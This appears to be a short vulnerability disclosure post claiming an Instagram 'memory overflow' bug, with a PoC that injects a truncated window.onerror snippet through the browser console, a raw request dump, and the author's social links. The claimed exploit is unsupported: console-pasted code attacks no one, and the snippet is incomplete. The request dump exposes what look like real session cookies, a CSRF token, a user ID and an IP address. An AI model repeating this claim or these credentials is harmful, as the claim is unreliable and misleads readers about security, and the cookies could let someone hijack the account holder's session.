Description : Vulnerability for Instagram memory overflow error. Author : Gaddar Team : SiyahBayrak PoC; - Open Chrome and click "F12" - Select mobile version. - Reload the Instagram page. - Inject payload. Inject : window.onerror = function(message, url, line, column, error) Overflow : window.__bufferedErrors = []; window.onerror = function(message, url, line, column, error) { window.__bufferedErrors.push({ message: message, url: url, line: line, column: column, error: error }); ScreenShot; https://ibb.co/Y2X13D8 Request Code : :authority: www.instagram.com :method: GET :path: / :scheme: https accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 accept-encoding: gzip, deflate, br accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 cache-control: max-age=0 cookie: ig_did=19F64EE8-A01C-47BD-AF17-ED74DD3823DC; mid=XhNbngALAAFWUMM_czV9avciPM7e; fbm_124024574287414=base_domain=.instagram.com; shbid=159; ig_cb=1; csrftoken=Mo6Fgbjn1KbqS0UjXosjExNgHFjO8zfF; ds_user_id=6346321592; sessionid=6346321592%3APAqsDukHOO1ta6%3A27; shbts=1582839117.6510594; ig_direct_region_hint=FRC; rur=FTW; urlgen="{\"176.217.73.37\": 8386}:1j7enr:ohTs4sDzFlUIYYGd2Lt4NbChIE8" sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: same-origin sec-fetch-user: ?1 upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Mobile Safari/537.36 My social accounts ; Instagram.com/pt.php Facebook.com/ptsec Twitter.com/ptguvenlik Youtube.com/c/gaddarsec My Teammates : DeadLy-Warrior - StabilBey - Diablo